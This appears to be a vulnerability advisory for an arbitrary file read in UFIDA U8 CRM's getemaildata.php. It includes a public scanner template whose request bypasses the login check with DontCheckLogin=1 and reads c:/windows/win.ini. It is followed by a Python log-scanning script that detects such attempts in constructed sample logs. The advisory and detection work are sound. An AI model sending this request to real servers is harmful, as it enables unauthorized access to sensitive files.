yonyou-u8-crm-lfi: UFIDA U8 CRM getemaildata.php - Arbitrary File Read

Date: 2025-08-01 | Affected software: UFIDA U8 CRM | PoC: public

Vulnerability description

There is an arbitrary file read vulnerability in getemaildata.php of the UFIDA U8 CRM customer relationship management system. An attacker can read sensitive files on the server through this vulnerability.

PoC code [public]

id: yonyou-u8-crm-lfi

info:
  name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="用友U8CRM"
  tags: yonyou,u8-crm,lfi,vuln

http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
        condition: and
# digest: 4a0a00473045022100a8537601c94a42d500f3e5e4ba0957326ac11e40d582d42d301103b3b9cb91c60220621d00f76f260e1a0693aae8d874724bf43ee43d908d511808c2528d31e821ea:922c64590222798bb761d5b6d8e72950
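The template above probes a single request shape: a POST to /ajax/getemaildata.php carrying DontCheckLogin=1 and a filePath pointing at an absolute or traversing location. The following Python script is an added detection example written for this page (not part of the template or of UFIDA's software); it runs that same request shape against constructed web-server access-log lines and flags entries that look like attempts to read files outside the application's own data. The log lines, IP addresses and file names are constructed samples, and the assumption is a combined-log layout where the request line is the quoted field.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not taken from any real system).
# Layout: client, ident, user, [timestamp], "METHOD target PROTO", status, bytes.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1" 200 512
203.0.113.5 - - [01/Aug/2025:10:00:02 +0000] "POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=..%2F..%2Fconfig.php HTTP/1.1" 200 2048
198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "POST /ajax/getemaildata.php?filePath=mail/12345.eml HTTP/1.1" 200 1024
198.51.100.7 - - [01/Aug/2025:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

# One request per line; the target (path + query) is the second word of the quoted request line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \d+'
)

VULNERABLE_PATH = "/ajax/getemaildata.php"


def classify_filepath(value):
    """Return the reasons a filePath value looks like an out-of-scope file read.

    An empty list means the value looks like an ordinary relative path.
    """
    # parse_qs already decodes once; decoding again catches double-encoded input.
    v = unquote(value).replace("\\", "/")
    reasons = []
    # Windows drive-letter paths (c:/...) or POSIX absolute paths (/...).
    if re.match(r"^[A-Za-z]:/", v) or v.startswith("/"):
        reasons.append("absolute path")
    # Any '..' segment walks out of the intended directory.
    if ".." in v.split("/"):
        reasons.append("directory traversal")
    return reasons


def scan_log(text):
    """Return one finding per log line that matches the exploit request shape."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(VULNERABLE_PATH):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        reasons = []
        if params.get("DontCheckLogin", [""])[0] == "1":
            reasons.append("DontCheckLogin=1 present")
        for fp in params.get("filePath", []):
            reasons.extend(classify_filepath(fp))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "filePath": params.get("filePath", [""])[0],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['timestamp']} status={f['status']} "
              f"filePath={f['filePath']!r}: {', '.join(f['reasons'])}")
```

A 200 status on a flagged line is the signal that matters most, since the template's matcher also requires a 200 plus file content in the body; a flagged request that was rejected is still worth noting as a probe, but a successful one means the file was served. The third sample line, a relative path under the mail directory without DontCheckLogin, is deliberately left unflagged so the rule does not fire on the endpoint's legitimate use.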